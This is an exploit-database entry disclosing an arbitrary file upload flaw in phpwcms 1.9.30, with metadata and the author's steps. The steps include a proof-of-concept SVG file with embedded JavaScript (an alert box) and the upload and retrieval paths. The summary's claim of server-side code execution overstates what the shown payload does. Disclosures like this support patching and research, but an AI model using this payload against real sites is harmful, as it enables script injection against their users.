Phpwcms 1.9.30 - Arbitrary File Upload

vendor:

phpwcms

by:

Okan Kurtulus

8,8

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: phpwcms

Affected Version From: 1.9.30

Affected Version To: 1.9.30

Patch Exists: NO

Related CWE: N/A

CPE: a:phpwcms:phpwcms:1.9.30

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 16.04

2021

Phpwcms 1.9.30 – Arbitrary File Upload

Phpwcms 1.9.30 is vulnerable to an arbitrary file upload vulnerability. An attacker can upload a malicious SVG file containing a malicious JavaScript payload, which can be used to execute arbitrary code on the server. The attacker needs to login to the system and create a payload with SVG extension. Then, the attacker needs to go to the file upload page and upload the malicious SVG file. After uploading the payload, the attacker can call it from the link provided.

Mitigation:

The user should ensure that the file upload feature is used only for legitimate purposes. The user should also ensure that the file upload feature is properly configured and that only the necessary file types are allowed.

Source

Exploit-DB raw data:

# Exploit Title: Phpwcms 1.9.30 - Arbitrary File Upload
# Date: 30/9/2021
# Exploit Author: Okan Kurtulus | okankurtulus.com.tr
# Software Link: http://www.phpwcms.org/
# Version: 1.9.30
# Tested on: Ubuntu 16.04

Steps:

1-) You need to login to the system.
http://target.com/phpwcms/login.php

2-) Creating payload with SVG extension: payload.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS!");
   </script>
</svg>


3-) Go to the following link and upload the payload:
http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8

From the menu:

file -> multiple file upload -> Select files or drop here

4-) After uploading payload, call it from the link below.

http://192.168.1.112/phpwcms/upload/